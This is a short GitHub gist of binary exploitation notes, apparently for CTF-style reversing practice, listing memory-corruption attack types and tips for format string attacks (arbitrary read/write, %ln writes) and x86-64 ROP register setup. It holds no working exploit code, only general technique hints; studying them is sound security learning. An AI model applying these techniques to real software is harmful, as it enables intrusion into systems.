Skip to content

Instantly share code, notes, and snippets.

@Enigmatrix

Enigmatrix/reversing-tips.md

Last active June 11, 2017 09:25
Show Gist options
  • Save Enigmatrix/5d6afa1b68400092e1e826f9b586389f to your computer and use it in GitHub Desktop.
Save Enigmatrix/5d6afa1b68400092e1e826f9b586389f to your computer and use it in GitHub Desktop.
Download ZIP
Raw
reversing-tips.md

Type of Attack

  1. Stack overflow
  2. Heap overflow
  3. Format String
  4. NULL byte / Off by one

Format String Attack Tips

  1. look at registers/stack, one of them will inevitably point to another value on stack (can do arbitrary read/write with this)
  2. look at registers/stack, one of them will point to libc's functions
  3. writing null bytes after a value can be done with %ln (write long int)
  4. writing 2 addresses at the same time is risky, but can be done

64bit tips

  1. param on registers, then stack (RDI, RSI, RDX, RCX, R8, R9, ..STACK | XMM0..7, ..STACK [for floating point])
  2. To set registers, ROP to pop rdi; ret
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment